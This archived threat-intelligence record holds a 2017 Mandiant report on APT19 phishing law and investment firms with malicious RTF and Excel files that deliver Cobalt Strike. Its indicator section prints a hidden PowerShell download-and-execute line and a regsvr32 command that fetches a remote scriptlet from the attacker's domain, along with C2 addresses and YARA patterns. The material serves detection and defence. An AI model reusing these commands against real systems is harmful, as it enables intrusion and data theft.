{
	"id": "a0e6f916-412e-44df-88d8-9e9c8cda2925",
	"created_at": "2026-04-06T00:11:00.600668Z",
	"updated_at": "2026-04-10T03:33:22.410459Z",
	"deleted_at": null,
	"sha1_hash": "6fc906897c5820e13db9717e4f62cbfd1dea8e75",
	"title": "Privileges and Credentials: Phished at the Request of Counsel | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2241826,
	"plain_text": "Privileges and Credentials: Phished at the Request of Counsel | Mandiant\r\nBy Mandiant\r\nPublished: 2017-06-06 · Archived: 2026-04-05 12:50:31 UTC\r\nSummary\r\nIn May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government.\r\nAPT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure delivered a Cobalt Strike payload.\r\nAs of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment firms for competitive economic purposes.\r\nThe purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide technical indicators that their IT personnel can use for proactive hunting and detection.\r\nThe Emails\r\nAPT19 phishing emails from this campaign originated from sender email accounts from the \"@cloudsend[.]net\" domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details.\r\nThe Attachments\r\nAPT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits. The following sections describe the two methods in further detail.\r\nRTF Attachments\r\nThrough the exploitation of the HTA handler vulnerability described in CVE-2017-0199, the observed RTF attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted at tk-in-f156.2bunny[.]com for further analysis. Figure 1 is a screenshot of a packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.\r\nhttps://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel\r\nPage 1 of 14\r\nXLSM Attachments\r\nThe XLSM attachments contained multiple worksheets with content that reflected the attachment name. The attachments also contained an image that requested the user to “Enable Content”, which would enable macro support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files (MD5: 30f149479c02b741e897cdb9ecd22da7).\r\nOne of the malicious XLSM attachments that we observed contained a macro that:\r\n1. Determined the system architecture to select the correct path for PowerShell\r\n2. Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique used by Meterpreter stagers.\r\nFigure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).\r\nFigure 4 contains the decoded output of the encoded text.\r\nFigure 4: Decoded ZLIB + Base64 payload\r\nThe shellcode invokes PowerShell to issue an HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers.\r\nFigure 5: GET Request with minimal HTTP headers\r\nConverting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.\r\nFigure 6: Decoded shellcode\r\nFireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.\r\nFigure 7: Alternate macro\r\nThis macro uses Casey Smith’s “Squiblydoo” Application Whitelisting bypass technique to run the command in Figure 8.\r\nFigure 8: Application Whitelisting Bypass\r\nThe command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.\r\nFigure 10 provides the decoded script. Notice the “$DoIt” string, which is usually indicative of a Cobalt Strike payload.\r\nFigure 10: Decoded SCT contents\r\nA quick conversion of the contents of the variable “$var_code” from Base64 to ASCII shows some familiar network indicators, shown in Figure 11.\r\nFigure 11: $var_code to ASCII\r\nSecond Stage Payload\r\nOnce the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload, configured with the following parameters:\r\nProcess Inject Targets:\r\n%windir%\\syswow64\\rundll32.exe\r\n%windir%\\sysnative\\rundll32.exe\r\nc2_user_agents\r\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)\r\nNamed Pipes\r\n\\\\%s\\pipe\\msagent_%x\r\nbeacon_interval\r\n60\r\nC2\r\nautodiscover.2bunny[.]com/submit.php\r\nautodiscover.2bunny[.]com/IE9CompatViewList.xml\r\nsfo02s01-in-f2.cloudsend[.]net/submit.php\r\nsfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml\r\nC2 Port\r\nTCP/80\r\nFigure 12 depicts an example of a BEACON C2 attempt from this payload.\r\nFigure 12: Cobalt Strike BEACON C2\r\nFireEye Product Detections\r\nThe following FireEye products currently detect and block the methods described above. Table 1 lists the current detection and blocking capabilities by product.\r\nDetection Name | Product | Action | Notes\r\nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY) | HX | Detect | XLSM Macro launch\r\nGen:Variant.Application.HackTool.CobaltStrike.1 | HX | Detect | XLSM Macro launch\r\nMalware Object | HX | Detect | BEACON written to disk\r\nBackdoor.BEACON | NX | Block* | BEACON Callback\r\nFE_Malformed_RTF | EX/ETP/NX | Block* | RTF\r\nMalware.Binary.rtf | EX/ETP/NX | Block* | RTF\r\nMalware.Binary | EX/ETP/NX | Block* | RTF\r\nMalware.Binary.xlsx | EX/ETP/NX | Block* | XLSM\r\nTable 1: Detection review\r\n*Appliances must be configured for block mode.\r\nRecommendations\r\nFireEye recommends organizations perform the following steps to mitigate the risk of this campaign:\r\n1. Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already installed it.\r\n2. Search historic and future emails that match the included indicators of compromise.\r\n3. Review web proxy logs for connections to the included network based indicators of compromise.\r\n4. Block connections to the included fully qualified domain names.\r\n5. Review endpoints for the included host based indicators of compromise.\r\nIndicators of Compromise\r\nThe following section provides the IOCs for the variants of the phishing emails and malicious payloads that FireEye has observed during this campaign.\r\nEmail Senders\r\nPressReader \u003cinfodept@cloudsend[.]net\u003e\r\nAngela Suh \u003cangela.suh@cloudsend[.]net\u003e\r\nAshley Safronoff \u003cashley.safronoff@cloudsend[.]net\u003e\r\nLindsey Hersh \u003clindsey.hersh@cloudsend[.]net\u003e\r\nSarah Roberto \u003csarah.roberto@cloudsend[.]net\u003e\r\nnoreply@cloudsend[.]net\r\nEmail Subject Lines\r\nMacron Denies Authenticity Of Leak, French Prosecutors Open Probe\r\nMacron Document Leaker Releases New Images, Promises More Information\r\nAre Emmanuel Macron's Tax Evasion Documents Real?\r\nTime Allocation\r\nVacancy Report\r\nchina paper table and graph\r\nresults with zeros – some ready not all finished\r\nMacron Leaks contain secret plans for the islamisation of France and Europe\r\nAttachment Names\r\nMacron_Authenticity.doc.rtf\r\nMacron_Information.doc.rtf\r\nUS and EU Trade with China and China CA.xlsm\r\nTables 4 5 7 Appendix with zeros.xlsm\r\nProject Codes - 05.30.17.xlsm\r\nWeekly Vacancy Status Report 5-30-15.xlsm\r\nMacron_Tax_Evasion.doc.rtf\r\nMacron_secret_plans.doc.rtf\r\nNetwork Based Indicators (NBI)\r\nlyncdiscover.2bunny[.]com\r\nautodiscover.2bunny[.]com\r\nlyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/\r\nlyncdiscover.2bunny[.]com/Autodiscover\r\nautodiscover.2bunny[.]com/K5om\r\nsfo02s01-in-f2.cloudsend[.]net/submit.php\r\nsfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml\r\ntk-in-f156.2bunny[.]com\r\ntk-in-f156.2bunny[.]com/Agreement.doc\r\n104.236.77[.]169\r\n138.68.45[.]9\r\n162.243.143[.]145\r\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)\r\ntf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)\r\nHost Based Indicators (HBI)\r\nRTF MD5 hash values\r\n0bef39d0e10b1edfe77617f494d733a8\r\n0e6da59f10e1c4685bb5b35a30fc8fb6\r\ncebd0e9e05749665d893e78c452607e2\r\nXLSM MD5 hash values\r\n38125a991efc6ab02f7134db0ebe21b6\r\n3a1dca21bfe72368f2dd46eb4d9b48c4\r\n30f149479c02b741e897cdb9ecd22da7\r\nBEACON and Meterpreter payload MD5 hash values\r\nbae0b39197a1ac9e24bdf9a9483b18ea\r\n1151619d06a461456b310096db6bc548\r\nProcess arguments, named pipes, and file paths\r\npowershell.exe -NoP -NonI -W Hidden -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"\")\r\nregsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll\r\n\\\\\\pipe\\msagent_\u003c4 digits\u003e\r\nC:\\Documents and Settings\\\\Local Settings\\Temp\\K5om.dll (4 character DLL based on URI of original GET request)\r\nYara Rules\r\nrule FE_LEGALSTRIKE_MACRO {\r\n meta:version=\".1\"\r\n filetype=\"MACRO\"\r\n author=\"Ian.Ahl@fireeye.com @TekDefense\"\r\n date=\"2017-06-02\"\r\n description=\"This rule is designed to identify macros with the specific encoding used in the sample 30f14\r\nstrings:\r\n // OBFUSCATION\r\n $ob1 = \"ChrW(114) \u0026 ChrW(101) \u0026 ChrW(103) \u0026 ChrW(115) \u0026 ChrW(118) \u0026 ChrW(114) \u0026 ChrW(51) \u0026 ChrW(50) \u0026 Chr\r\n $ob2 = \"ChrW(120) \u0026 ChrW(101) \u0026 ChrW(32) \u0026 ChrW(47) \u0026 ChrW(115) \u0026 ChrW(32) \u0026 ChrW(47) \u0026 ChrW(110) \u0026 ChrW(\r\n $ob3 = \"ChrW(117) \u0026 ChrW(32) \u0026 ChrW(47) \u0026 ChrW(105) \u0026 ChrW(58) \u0026 ChrW(104) \u0026 ChrW(116) \u0026 ChrW(116) \u0026 ChrW\r\n $ob4 = \"ChrW(58) \u0026 ChrW(47) \u0026 ChrW(47) \u0026 ChrW(108) \u0026 ChrW(121) \u0026 ChrW(110) \u0026 ChrW(99) \u0026 ChrW(100) \u0026 ChrW(\r\n $ob5 = \"ChrW(99) \u0026 ChrW(111) \u0026 ChrW(118) \u0026 ChrW(101) \u0026 ChrW(114) \u0026 ChrW(46) \u0026 ChrW(50) \u0026 ChrW(98) \u0026 ChrW(\r\n $ob6 = \"ChrW(110) \u0026 ChrW(121) \u0026 ChrW(46) \u0026 ChrW(99) \u0026 ChrW(111) \u0026 ChrW(109) \u0026 ChrW(47) \u0026 ChrW(65) \u0026 ChrW(\r\n $ob7 = \"ChrW(111) \u0026 ChrW(100) \u0026 ChrW(105) \u0026 ChrW(115) \u0026 ChrW(99) \u0026 ChrW(111) \u0026 ChrW(118) \u0026 ChrW(101) \u0026 Ch\r\n $ob8 = \"ChrW(115) \u0026 ChrW(99) \u0026 ChrW(114) \u0026 ChrW(111) \u0026 ChrW(98) \u0026 ChrW(106) \u0026 ChrW(46) \u0026 ChrW(100) \u0026 ChrW\r\n $obreg1 = /(\\w{5}\\s\u0026\\s){7}\\w{5}/\r\n $obreg2 = /(Chrw\\(\\d{1,3}\\)\\s\u0026\\s){7}/\r\n // wscript\r\n $wsobj1 = \"Set Obj = CreateObject(\\\"WScript.Shell\\\")\" ascii wide\r\n $wsobj2 = \"Obj.Run \" ascii wide\r\ncondition:\r\n (\r\n (\r\n (uint16(0) != 0x5A4D)\r\n )\r\n and\r\n (\r\n all of ($wsobj*) and 3 of ($ob*)\r\n or\r\n all of ($wsobj*) and all of ($obreg*)\r\n )\r\n )\r\n}\r\nrule FE_LEGALSTRIKE_MACRO_2 {\r\n meta:version=\".1\"\r\n filetype=\"MACRO\"\r\n author=\"Ian.Ahl@fireeye.com @TekDefense\"\r\n date=\"2017-06-02\"\r\n description=\"This rule was written to hit on specific variables and powershell command fragments as seen\r\nstrings:\r\n // Setting the environment\r\n $env1 = \"Arch = Environ(\\\"PROCESSOR_ARCHITECTURE\\\")\" ascii wide\r\n $env2 = \"windir = Environ(\\\"windir\\\")\" ascii wide\r\n $env3 = \"windir + \\\"\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe\\\"\" ascii wide\r\n // powershell command fragments\r\n $ps1 = \"-NoP\" ascii wide\r\n $ps2 = \"-NonI\" ascii wide\r\n $ps3 = \"-W Hidden\" ascii wide\r\n $ps4 = \"-Command\" ascii wide\r\n $ps5 = \"New-Object IO.StreamReader\" ascii wide\r\n $ps6 = \"IO.Compression.DeflateStream\" ascii wide\r\n $ps7 = \"IO.MemoryStream\" ascii wide\r\n $ps8 = \",$([Convert]::FromBase64String\" ascii wide\r\n $ps9 = \"ReadToEnd();\" ascii wide\r\n $psregex1 = /\\W\\w+\\s+\\s\\\".+\\\"/\r\ncondition:\r\n (\r\n (\r\n (uint16(0) != 0x5A4D)\r\n )\r\n and\r\n (\r\n all of ($env*) and 6 of ($ps*)\r\n or\r\n all of ($env*) and 4 of ($ps*) and all of ($psregex*)\r\n )\r\n )\r\n}\r\nrule FE_LEGALSTRIKE_RTF {\r\n meta:\r\n version=\".1\"\r\n filetype=\"MACRO\"\r\n author=\"joshua.kim@FireEye.com\"\r\n date=\"2017-06-02\"\r\n description=\"Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDO\r\n strings:\r\n $header = \"{\\\\rt\"\r\n $lnkinfo = \"4c0069006e006b0049006e0066006f\"\r\n $encoded1 = \"4f4c45324c696e6b\"\r\n $encoded2 = \"52006f006f007400200045006e007400720079\"\r\n $encoded3 = \"4f0062006a0049006e0066006f\"\r\n $encoded4 = \"4f006c0065\"\r\n $http1 = \"68{\"\r\n $http2 = \"74{\"\r\n $http3 = \"07{\"\r\n // 2bunny.com\r\n $domain1 = \"32{\\\\\"\r\n $domain2 = \"62{\\\\\"\r\n $domain3 = \"75{\\\\\"\r\n $domain4 = \"6e{\\\\\"\r\n $domain5 = \"79{\\\\\"\r\n $domain6 = \"2e{\\\\\"\r\n $domain7 = \"63{\\\\\"\r\n $domain8 = \"6f{\\\\\"\r\n $domain9 = \"6d{\\\\\"\r\n $datastore = \"\\\\*\\\\datastore\"\r\n condition:\r\n $header at 0 and all of them\r\n}\r\nAcknowledgements\r\nJoshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel"
	],
	"report_names": [
		"phished-at-the-request-of-counsel"
	],
	"threat_actors": [
		{
			"id": "1f3cf3d1-4764-4158-a216-dd6352e671bb",
			"created_at": "2022-10-25T15:50:23.837615Z",
			"updated_at": "2026-04-10T02:00:05.322197Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"APT19",
				"Codoso",
				"C0d0so0",
				"Codoso Team",
				"Sunshop Group"
			],
			"source_name": "MITRE:APT19",
			"tools": [
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "46a151bd-e4c2-46f9-aee9-ee6942b01098",
			"created_at": "2023-01-06T13:46:38.288168Z",
			"updated_at": "2026-04-10T02:00:02.911919Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"DEEP PANDA",
				"Codoso",
				"KungFu Kittens",
				"Group 13",
				"G0009",
				"G0073",
				"Checkered Typhoon",
				"Black Vine",
				"TEMP.Avengers",
				"PinkPanther",
				"Shell Crew",
				"BRONZE FIRESTONE",
				"Sunshop Group"
			],
			"source_name": "MISPGALAXY:APT19",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f2ce5b52-a220-4b94-ab66-4b81f3fed05d",
			"created_at": "2025-08-07T02:03:24.595597Z",
			"updated_at": "2026-04-10T02:00:03.740023Z",
			"deleted_at": null,
			"main_name": "BRONZE FIRESTONE",
			"aliases": [
				"APT19 ",
				"C0d0s0",
				"Checkered Typhoon ",
				"Chlorine ",
				"Deep Panda ",
				"Pupa ",
				"TG-3551 "
			],
			"source_name": "Secureworks:BRONZE FIRESTONE",
			"tools": [
				"9002",
				"Alice's Rabbit Hole",
				"Cobalt Strike",
				"Derusbi",
				"PlugX",
				"PoisonIvy",
				"PowerShell Empire",
				"Trojan Briba",
				"Zuguo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434260,
	"ts_updated_at": 1775792002,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6fc906897c5820e13db9717e4f62cbfd1dea8e75.pdf",
		"text": "https://archive.orkl.eu/6fc906897c5820e13db9717e4f62cbfd1dea8e75.txt",
		"img": "https://archive.orkl.eu/6fc906897c5820e13db9717e4f62cbfd1dea8e75.jpg"
	}
}